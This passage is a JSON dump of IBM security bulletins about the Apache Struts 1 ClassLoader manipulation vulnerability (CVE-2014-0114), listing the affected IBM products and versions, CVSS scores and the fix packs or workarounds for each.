["CVE-2014-0114"], "modified": "2018-06-15T07:00:18", "id": "1CC43C4A66365486759EFB8BF9ACE86934571B8459B6E66D63A5190659B18DB4", "href": "https://www.ibm.com/support/pages/node/510569", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:58:35", "description": "## Summary\n\nThere is a classloader manipulation vulnerability in the Apache Struts 1 that is used by IBM WebSphere Application Server shipped with IBM WebSphere Service Registry and Repository v6.2, v6.3, v7.0 and v7.5.\n\n## Vulnerability Details\n\nThis vulnerability is fixed within WebSphere Application Server Interim Fix PI17190. To download the fix and for more information see: [**Security Bulletin: Classloader Manipulation Vulnerability in IBM WebSphere Application Server CVE-2014-0114**](<http://www-01.ibm.com/support/docview.wss?uid=swg21672316>)\n\n## ", "cvss3": {}, "published": "2018-06-15T07:00:16", "type": "ibm", "title": "Security Bulletin: Classloader Manipulation Vulnerability in IBM WebSphere Application Server shipped with WebSphere Service Registry and Repository (CVE-2014-0114)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2018-06-15T07:00:16", "id": "704897FEF5CE3D4AA35FF51AE237FF23A83A38E10F9597332BAF89DF648929A5", "href": "https://www.ibm.com/support/pages/node/510307", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-12T21:33:39", "description": "## Summary\n\nThere is a classloader manipulation vulnerability in the Apache Struts 1 that is used by IBM WebSphere Application Server. IBM Security Key Lifecycle Manager is not affected by this vulnerability.\n\n## Affected Products and Versions\n\nNone\n\n## Remediation/Fixes\n\nIBM WebSphere Application Server has deprecated this feature starting WebSphere Application Server v7.0. \n<https://www.ibm.com/support/knowledgecenter/en/SSAW57_8.5.5/com.ibm.websphere.nd.multiplatform.doc/ae/rmig_depfeat.html>\n\nSecurity Bulletin released by WebSphere Application Server : <http://www-01.ibm.com/support/docview.wss?uid=swg21672316>\n\nclearly states \"If your Java Web Application is using Apache Struts version 1.x that is available in WebSphere Application Server's optional libraries, you also may be vulnerable. \" IBM Security Key Lifecycle Manager does not use it and is not affected by this.\n\nImportant! IBM is planning on removing and no longer shipping all 4 versions of Struts Version 1.x from the optional Libraries starting in WebSphere Application Server 7.0.0.43, 8.0.0.13, 8.5.5.11 and 9.0.0.1.\n\n## ", "cvss3": {}, "published": "2018-07-20T14:15:12", "type": "ibm", "title": "Security Bulletin: Classloader Manipulation Vulnerability in IBM WebSphere Application Server (CVE-2014-0114) Does Not Affect IBM Security Key Lifecycle Manager", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0114"], "modified": "2018-07-20T14:15:12", "id": "0805E7A2C6036D7FEBAF075EE767AB91B73C933992CD43256425DCE028EA66B7", "href": "https://www.ibm.com/support/pages/node/718243", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-02-21T05:52:24", "description": "## Summary\n\nThere is a ClassLoader manipulation vulnerability in Apache Struts that is used by IBM QRadar Security Information and Event Manager (SIEM).\n\n## Vulnerability Details\n\n**CVEID:** \n[_CVE-2014-0114_](<https://vulners.com/cve/CVE-2014-0114>) \n \n**DESCRIPTION: **Apache Struts 1.X could allow a remote attacker to execute arbitrary code on the system, caused by the failure to restrict the setting of Class Loader attributes. An attacker could exploit this vulnerability using the class parameter of an ActionForm object to manipulate the ClassLoader and execute arbitrary code on the system. There is partial impact to confidentiality, integrity, and availability. \n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/92889_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92889>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n\n## Affected Products and Versions\n\n * * QRadar SIEM v7.0 MR5 \n * QRadar SIEM v7.1 MR2\n * QRadar SIEM v7.2 MR2\n\n## Remediation/Fixes\n\n * * [_QRadar SIEM v7.0 MR5 Patch 8 IFix01_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.0.0&platform=All&function=all>)\n * [_QRadar SIEM v7.1 MR2 Patch 6 IFix01_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.1.0&platform=All&function=all>)\n * [_QRadar SIEM v7.2 MR2 Patch 2 IFix01_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.2.0&platform=All&function=all>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {}, "published": "2018-06-16T21:17:59", "type": "ibm", "title": "Security Bulletin: ClassLoader manipulation with Apache Struts affecting IBM QRadar SIEM (CVE-2014-0114)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2018-06-16T21:17:59", "id": "D222C68A9F9279A22A6D872628487DC4677D4BD829C33171CED7B9CDFF159C1B", "href": "https://www.ibm.com/support/pages/node/512181", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:48:05", "description": "## Summary\n\nThere is a classloader manipulation vulnerability in the Apache Struts 1 used by the Administrative Console in IBM WebSphere Application Server that is shipped with IBM Content Collector.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2014-0114_](<https://vulners.com/cve/CVE-2014-0114>) \nDescription: Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to restrict the setting of Class Loader attributes. Together with IBM Content Collector Struts 1 is used by the Administrative Console in IBM WebSphere Application Server. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/92889_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92889>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n\n## Affected Products and Versions\n\nIBM Content Collector V2.2\n\n## Remediation/Fixes\n\n**_Product_**\n\n| **_VRMF_**| **_Remediation/First Fix_** \n---|---|--- \nIBM Content Collector| 2.2.0.0 - 2.2.0.4| Apply Fix Pack 2.2.0.5-ICC-FP005, available from Fix Central \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {}, "published": "2018-06-17T12:07:58", "type": "ibm", "title": "Security Bulletin: Classloader Manipulation Vulnerability in IBM WebSphere Application Server shipped with IBM Content Collector (CVE-2014-0114)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2018-06-17T12:07:58", "id": "39FB3D1F38AC89BD19681FEACE87FB4DAA9E420720F8827CC4AA35F63756931E", "href": "https://www.ibm.com/support/pages/node/513809", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:48:06", "description": "## Summary\n\nApache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to restrict the setting of Class Loader attributes. An attacker could exploit this vulnerability using the class parameter of an ActionForm object to manipulate the ClassLoader and execute arbitrary code on the system.\n\n## Vulnerability Details\n\n**CVEID: **CVE-2014-0114 \n \n**DESCRIPTION: ** \nOpen Source Apache Struts V1 ClassLoader manipulation vulnerability \n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/92889> for more information \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n## Affected Products and Versions\n\nWEB interface for Content Management (WEBi) v1.0.4\n\n## Remediation/Fixes\n\nInstall WEBi 1.0.4 Fix Pack 5, Interim Fix 2 \n(1.0.4-IM-WEBi-xxx-FP0005.03 where xxx is required platform.)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {}, "published": "2018-06-17T12:07:57", "type": "ibm", "title": "Security Bulletin: Open Source Apache Struts V1 ClassLoader manipulation vulnerability (CVE-2014-0114) in IBM Web Interface for Content Management (WEBi)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2018-06-17T12:07:57", "id": "0A2242182FF9C6E616AD12CDAF12C0AD6141133E4FF262F6CC0FA251C0F7DD9F", "href": "https://www.ibm.com/support/pages/node/513421", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:48:07", "description": "## Summary\n\nThere is a ClassLoader manipulation vulnerability in Apache Struts that is used by IBM Records Manager and IBM Content Manager Records Enabler. The security vulnerability has also been identified in WebSphere Application Server shipped with IBM Records Manager. \n\n## Vulnerability Details\n\nCVEID: [CVE-2014-0114](<https://vulners.com/cve/CVE-2014-0114>) \n \nDESCRIPTION: Apache Struts 1.X could allow a remote attacker to execute arbitrary code on the system, caused by the failure to restrict the setting of Class Loader attributes. An attacker could exploit this vulnerability using the class parameter of an ActionForm object to manipulate the ClassLoader and execute arbitrary code on the system. There is partial impact to confidentiality, integrity, and availability. \n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/92889> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n\n\nWebSphere Application Server is shipped as a component of IBM Records Manager. Information about a security vulnerability affecting WebSphere Application Server has been published in a security bulletin. Please consult the security bulletin [Classloader Manipulation Vulnerability in IBM WebSphere Application Server CVE-2014-0114](<http://www-01.ibm.com/support/docview.wss?uid=swg21672316>) for vulnerability details.\n\n## Affected Products and Versions\n\n**Affected Princ****iple Products and Versions**\n\n| **Affected Supporting Product and Versions** \n---|--- \nIBM Records Manager Version 8.4| WebSphere Application Server Version 6.1 \nIBM Records Manager Version 8.5| WebSphere Application Server Version 6.1 \nWebSphere Application Server Version 7.0 \nIBM Content Manager Records Enabler Version 8.4| WebSphere Application Server Version 6.1 \nIBM Content Manager Records Enabler Version 8.5| WebSphere Application Server Version 6.1 \nWebSphere Application Server Version 7.0 \n \n## Remediation/Fixes\n\n**Product**\n\n| **Version**| **Remediation/First Fix** \n---|---|--- \nIBM Records Manager| 8.5| 8.5.0.7 \n \n| 8.4| 8.4.0.2 IF001 \nIBM Content Manager Records Enabler| 8.5| 8.5.0.7 \n \n| 8.4| 8.4.1.1 IF001 \nThe Fix Packs and Interim Fixes above are available from IBM Fix Central site (<http://ibm.com/support/fixcentral/>). \n\nFor Websphere Application Server affected as supporting product, please consult the security bulletin [Classloader Manipulation Vulnerability in IBM WebSphere Application Server CVE-2014-0114](<http://www-01.ibm.com/support/docview.wss?uid=swg21672316>) for remediation/fixes.\n\n## Workarounds and Mitigations\n\nNone known, apply fixes\n\n## ", "cvss3": {}, "published": "2018-06-17T12:07:53", "type": "ibm", "title": "Security Bulletin: ClassLoader manipulation with Apache Struts affecting IBM Records Manager, IBM Content Manager Records Enabler and WebSphere Application Server shipped with IBM Records Manager (CVE-2014-0114)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2018-06-17T12:07:53", "id": "8E4DBE94121ABE32EB52144CFDD57FDF0D6884516B0DEA8E9B75FEDC0CA31C5C", "href": "https://www.ibm.com/support/pages/node/512573", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:49:31", "description": "## Summary\n\nThere is a classloader manipulation vulnerability in the Apache Struts that is used by the IBM WebSphere Application Server 6.1 and 7.0. \n\n## Vulnerability Details\n\n| **Subscribe to My Notifications to be notified of important product support alerts like this.**\n\n * Follow [this link](<https://www.ibm.com/systems/support/myview/subscription/css.wss/subscriptions?methodName=startSearchToSubscribe&uctug_rational_dcfsbblurb_2013-11-05_myn_adoption_promo>) for more information (requires login with your IBM ID) \n---|--- \n \nThe Apache Struts version 1.x used by the Administrative Console in WebSphere Application Server (WAS) version 6.1.0.0-6.1.0.47 and 7.0.0.0-7.0.0.29 may be vulnerable to a class loader manipulation. If you are running the Rational Insight report server or the Rational Insight Data Services on these versions of WAS, it is strongly recommended that you apply the WAS interim fix described below. \n \n \n**Note:** Rational Insight does not use Apache Struts and is not directly affected by this vulnerability. This vulnerability also does not affect IBM WebSphere Application Server version 8.0.x.x or 8.5.x.x. \n \n**CVE ID:** [_CVE-2014-0114_](<https://vulners.com/cve/CVE-2014-0114>) \n \n**Description: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to restrict the setting of Class Loader attributes. \n \n**CVSS Base Score:** 7.5 \n**CVSS Temporal Score:** See <https://exchange.xforce.ibmcloud.com/vulnerabilities/92889> for the current score \n**CVSS Environmental Score*:** Undefined \n**CVSS Vector:** (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n\n## Affected Products and Versions\n\nRational Insight 1.0, 1.0.0.1, 1.0.0.2, 1.0.1, 1.0.1 iFix1, 1.0.1.1, 1.1, 1.1.1, 1.1.1.1, 1.1.1.2 and 1.1.1.3\n\n## Remediation/Fixes\n\nFollow the steps detailed in Security Bulletin [1672316: Security Bulletin: Classloader Manipulation Vulnerability in IBM WebSphere Application Server CVE-2014-0114](<http://www.ibm.com/support/docview.wss?uid=swg21672316>).\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {}, "published": "2018-06-17T04:54:29", "type": "ibm", "title": "Security Bulletin: Rational Insight - Apache Struts used by WebSphere Application Server 6.1 and 7 (CVE-2014-0114)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2018-06-17T04:54:29", "id": "0309A53D35EF827194465C9C10BC98B7D4795038C7221686EE2E7A4669562BD7", "href": "https://www.ibm.com/support/pages/node/510871", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:54:08", "description": "## Summary\n\nThere is a ClassLoader manipulation vulnerability in Apache Struts that is used by InfoSphere Identity Insight.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2014-0114_](<https://vulners.com/cve/CVE-2014-0114>) \n[](<https://vulners.com/cve/CVE-2014-0114>) \n[Apache Struts 1.X could allow a remote attacker to execute arbitrary code on the system, caused by the failure to restrict the setting of Class Loader attributes. An attacker could exploit this vulnerability using the class parameter of an ActionForm object to manipulate the ClassLoader and execute arbitrary code on the system. There is partial impact to confidentiality, integrity, and availability. \n](<https://vulners.com/cve/CVE-2014-0114>) \n[CVSS Base Score: 7.5 \nCVSS Temporal Score: See ](<https://vulners.com/cve/CVE-2014-0114>)[_https://exchange.xforce.ibmcloud.com/vulnerabilities/92889_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92889>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n\n## Affected Products and Versions\n\nInfoSphere Identity Insight v8.1, v8.0\n\n## Remediation/Fixes\n\n_Product_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \n_InfoSphere Identity Insight_| _8.1.0_| \n| [_8.1.0.3 Hotfix1 - Build 196_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/InfoSphere+Identity+Insight&release=8.1.0.3&platform=All&function=all>) \n_InfoSphere Identity Insight_| _8.0.0_| \n| [_8.0.0.2 Hotfix 5B - Build 152_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/InfoSphere+Identity+Insight&release=8.0.0.2&platform=All&function=all>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {}, "published": "2018-06-16T13:06:21", "type": "ibm", "title": "Security Bulletin: ClassLoader manipulation with Apache Struts affecting InfoSphere Identity Insight (CVE-2014-0114)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2018-06-16T13:06:21", "id": "48F32F0BE81F12977F3F77EC7A1B784BEEE2CB897C3A11E48967C396BAD27436", "href": "https://www.ibm.com/support/pages/node/513577", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:49:31", "description": "## Summary\n\nA security vulnerability has been identified in WebSphere Application Server shipped with IBM Rational RequisitePro.\n\n## Vulnerability Details\n\n| **Subscribe to My Notifications to be notified of important product support alerts like this.**\n\n * Follow [this link](<https://www.ibm.com/systems/support/myview/subscription/css.wss/subscriptions?methodName=startSearchToSubscribe&uctug_rational_dcfsbblurb_2013-11-05_myn_adoption_promo>) for more information (requires login with your IBM ID) \n---|--- \n \nReview [Security Bulletin: Classloader Manipulation Vulnerability in IBM WebSphere Application Server](<https://www-304.ibm.com/support/docview.wss?uid=swg21672316>) for vulnerability details. \n\n## Affected Products and Versions\n\nIBM Rational RequisitePro versions 7.1.0 through 7.1.1.9, 7.1.2 through 7.1.2.13.01 and 7.1.3 through 7.1.3.10.01 ship with or require versions of WebSphere Application Server that are affected.\n\n## Remediation/Fixes\n\nReview the **Remediation/Fixes** section of [Security Bulletin: Classloader Manipulation Vulnerability in IBM WebSphere Application Server](<https://www-304.ibm.com/support/docview.wss?uid=swg21672316>) for links to the the downloads to resolve this issue. \n \nReview technote [1390803: Update the WebSphere Application Server components in Rational ClearCase and Rational ClearQuest 7.1](<http://www.ibm.com/support/docview.wss?uid=swg21390803>) for instructions on updating WebSphere Application Server.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {}, "published": "2018-06-17T04:54:44", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Applicaiton Server shipped with Rational RequisitePro (CVE-2014-0114)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0114"], "modified": "2018-06-17T04:54:44", "id": "CEF23955780B797D3E4DFF7B2586F5C1F6FE284FDC236FD6F838681B4A03628B", "href": "https://www.ibm.com/support/pages/node/511925", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-02-21T05:46:44", "description": "## Summary\n\nTivoli Integrated Portal (TIP) & embedded Websphere Application Server (eWAS) are shipped as a component of Tivoli Netcool/Impact. Information about a security vulnerability affecting Tivoli Integrated Portal (TIP) & embedded Websphere Application Server (eWAS) has been published in a security bulletin. \n\n## Vulnerability Details\n\nPlease consult the security bulletin[ **Security Bulletin: ClassLoader manipulation with Apache Struts affecting Tivoli Integrated Portal (CVE-2014-0114)**](<http://www-01.ibm.com/support/docview.wss?uid=swg21674379>) for vulnerability details with regards to Tivoli Integrated Portal. \n \nFor Websphere Application Server see Security [**Bulletin: Classloader Manipulation Vulnerability in IBM WebSphere Application Server CVE-2014-0114**](<http://www-01.ibm.com/support/docview.wss?uid=swg21672316>).\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \n**Tivoli Netcool/Impact** 6.1.0; 6.1.1| **Tivoli Integrated Portal (TIP)** 2.x \n**Tivoli Netcool/Impact** 5.1.0;5.1.1| **Websphere Application Server 6.1** \n \n## ", "cvss3": {}, "published": "2018-06-17T14:41:44", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in Tivoli Integrated Portal (TIP) & embedded Websphere Application Server (eWAS) shipped with Tivoli Netcool/Impact (CVE-2014-0114)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2018-06-17T14:41:44", "id": "5248B9256CAD1F8D158CE63A6D338882538AB4CB774063A0FD1F9D65202CEB84", "href": "https://www.ibm.com/support/pages/node/511907", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:54:07", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of InfoSphere MashupHub. Information about a security vulnerability affecting WebSphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\nPlease consult the security bulletin [_Security Bulletin: Classloader Manipulation Vulnerability in IBM WebSphere Application Server CVE-2014-0114_](<http://www-01.ibm.com/support/docview.wss?uid=swg21672316>) for vulnerability details.\n\n## Affected Products and Versions\n\n**Affected Product and Version(s)**\n\n| **Product and Version shipped as a component** \n---|--- \nInfoSphere MashupHub version 2.x | IBM WebSphere Application Server version 7.0.0.5 \nInfoSphere MashupHub version 3.x | IBM WebSphere Application Server version 7.0.0.11 \n \n## ", "cvss3": {}, "published": "2018-06-16T13:06:03", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server version 7 shipped with InfoSphere MashupHub (CVE-2014-0114)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2018-06-16T13:06:03", "id": "140E90DD98ED4CC1A8C413867579B2EF4F8885020D8C9B221D7DC0EFA3D20518", "href": "https://www.ibm.com/support/pages/node/510709", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:54:08", "description": "## Summary\n\nWebSphere v6.1 and WebSphere v7.x is shipped as a component of InfoSphere Warehouse v9.5, V9.7, V10.1,and v10.5 . Information about a security vulnerability affecting WebSphere v6.1 and WebSphere v7.x has been published in a security bulletin. \n\n\n## Vulnerability Details\n\nPlease consult the security bulletin [WebSphere v6.1 and V7.x Security Bulletin](<https://www-304.ibm.com/support/docview.wss?uid=swg21672316>) for vulnerability details.\n\n## Affected Products and Versions\n\nAffected Product and Version(s)\n\n| Product and Version shipped as a component \n---|--- \nWebSphere v6.1| InfoSphere Warehouse v9.5 \nWebSphere v7.x| InfoSphere Warehouse v9.7 \nInfoSphere Warehouse v10.1 \nInfoSphere Warehouse v10.5 \n \n## Remediation/Fixes\n\nPlease follow the WebSphere Security Bulletin\n\n## ", "cvss3": {}, "published": "2018-06-16T13:06:04", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in WebSphere v6.1 and v7.x shipped with InfoSphere Warehouse v9.5, V9.7, V10.1,and v10.5 (CVE-2014-0114)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0114"], "modified": "2018-06-16T13:06:04", "id": "DF4E8F31FE043E3CFA77E41A2F0CE2691BCEBF5ACB3B2A8B13BD91911951419D", "href": "https://www.ibm.com/support/pages/node/510851", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-02-21T01:47:28", "description": "## Summary\n\nThere is a ClassLoader manipulation vulnerability in Apache Struts that is used by IBM Tivoli Netcool/OMNIbus_GUI \n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2014-0114_](<https://vulners.com/cve/CVE-2014-0114>) \n \n**DESCRIPTION: **Apache Struts 1.X could allow a remote attacker to execute arbitrary code on the system, caused by the failure to restrict the setting of Class Loader attributes. An attacker could exploit this vulnerability using the class parameter of an ActionForm object to manipulate the ClassLoader and execute arbitrary code on the system. There is partial impact to confidentiality, integrity, and availability. \n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/92889> for the current score \nCVSS Environmental Score*: Undefine \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n\n## Affected Products and Versions\n\nIBM Tivoli Netcool/OMNIbus_GUI releases 7.3.0; 7.3.1; and 7.4 are affected.\n\n## Remediation/Fixes\n\nIBM Tivoli Netcool/OMNIbus_GUI releases 7.3.0; 7.3.1 are no longer supported, please upgrade to their latest fix pack or 7.4\n\n_VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|--- \n7.4.0| IV60138 | [_http://www-01.ibm.com/support/docview.wss?uid=swg24038042_](<http://www-01.ibm.com/support/docview.wss?uid=swg24038042>) \n \n## ", "cvss3": {}, "published": "2018-06-17T14:45:30", "type": "ibm", "title": "Security Bulletin:ClassLoader manipulation with Apache Struts affecting IBM Tivoli Netcool/OMNIbus_GUI (CVE-2014-0114)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2018-06-17T14:45:30", "id": "341A93FC1A45E72ADD48241188A719F3789D0F8084730D93C2ACFB474C42ABB1", "href": "https://www.ibm.com/support/pages/node/246567", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:53:19", "description": "## Summary\n\nApache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to restrict the setting of Class Loader attributes. An attacker could exploit this vulnerability using the class parameter of an ActionForm object to manipulate the ClassLoader and execute arbitrary code on the system. IBM Information Server and constituent products are impacted.\n\n## Vulnerability Details\n\n**CVE ID: **[**_CVE-2014-0114_**](<https://vulners.com/cve/CVE-2014-0114>)** ** \n \n**CVSS:** \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See 